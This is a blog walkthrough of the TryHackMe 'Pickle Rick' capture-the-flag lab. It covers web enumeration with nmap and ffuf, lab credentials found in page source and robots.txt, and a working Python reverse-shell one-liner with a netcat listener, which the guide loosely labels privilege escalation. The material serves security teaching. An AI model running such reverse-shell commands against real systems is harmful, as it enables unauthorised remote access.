April 25, 2024

Pickle Rick TryHackMe Walkthrough

Tinku July 30, 2021 0
Post Views: 837

Pickle Rick TryHackMe Walkthrough

pickle-rick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Today we will see how to solve a capture the flag challenge called “Pickle Rick”. It is a penetration testing lab available at TryHackMe. This challenge gives us hands-on on basic penetration testing techniques. It includes techniques such as scanning, enumeration, privilege escalation.

Credits for the machine goes to – TryHackMe

ethical hacking course

  Level: Easy

# What is the first ingredient Rick needs?

First of all, we will scan the machine IP with nmap and check all services are working on the machine. We found that on port no 80 HTTP services are active.

Nmap

We will now check the source page of the website and see if we can get some hints. Here we found the username.
Username ->R1ckRul3s

pickle-rick-user-name

Next, we tried to find the open directories using the tool ffuf. There are 2 open directories index.html and robots.txt .
command -> ffuf -t 100 -c -w /usr/share/dirb/wordlists/common.txt -u http://<machine_ip>/FUZZ

Ffuf-directory-scan

Then we will try to open the directories we found.  found a value in robots.txt.

pickle-rick-password

 

 

We will now search for a login page. We have scanned the website further and found a login page “login.php”.

pickle-rick-login-page

Open the login page and enter username and password we inittitaly found.

Username ->R1ckRul3s
password-> Wubbalubbadubdub

pickle-rick-login-pannel

We will then get a command panel
command -> ls

pickle-rick-logi-command-pannel

Sup3rS3cretPickl3Ingred.txt file contains the first flag!

 

 

 

# Whats the second ingredient Rick needs?

 

Since we didn’t have the super user access, we have to escalate our privileges.

For escalating our privileges we have used python3.
Command:
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<machine_IP>”,<Port_no>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Python-Privilege-Escalation

Before executing the command open the listening port.
command -> nc -lnvp <port_no>
-l => for opening listening port
-n => for getting the reverse shell
-v => for verbose
-p => for port number

After executing the command we will get a reverse shell.

netcat-listener-command

#Whats the second ingredient Rick needs?

Traverse through the directories to find the flag 2!
command -> cat ‘second ingredients’

pickle-rick-flag-2

# Whats the final ingredient Rick needs?

Traverse through the directories to find the flag 3!
command -> cat 3rd.txt

pickle-rick-flag-3

 

You May Also Like:-

How do find all hidden files and folders of web applications?
How to Find Information About Websites with Th3inspector

 

 

About Author

Tinku

See author's posts

Tags: , , , , , , , , , , , ,

More Stories

How to Use WPScan A Step-by-Step Tutorial

Tahir April 16, 2024 0
Exploring Malware Threats

Exploring Malware Threats: A Vital Component of CEH Module

Tahir April 4, 2024 0
Enumeration in Ethical Hacking

Enumeration in Ethical Hacking

Tahir April 4, 2024 0

Leave a Reply

Your email address will not be published. Required fields are marked *

You may have missed

Billions of Scraped Discord Messages Up for Sale on Spy.Pet

Tahir April 25, 2024 0

Beware! Check Your Child in School Before Paying The Online Ransom Money

Tahir April 25, 2024 0
Jaipur Police Website Hacked

Jaipur Police Website Hacked, Fraudster Arrested Used To Get CDR Issued by Sending Mails on Police Name

Tahir April 24, 2024 0

Cyber Fraud Mitigation Center (CFMC) Will Be Setup After This Lok Sabha Elections 2024 to Control Cyber Crimes

Tahir April 24, 2024 0

Ransomware Payments Decline as More Organizations Deny to Pay Extortion Demands: Report

Tahir April 24, 2024 0
en_USEnglish
en_USEnglish
Open chat
Hello
Can we help you?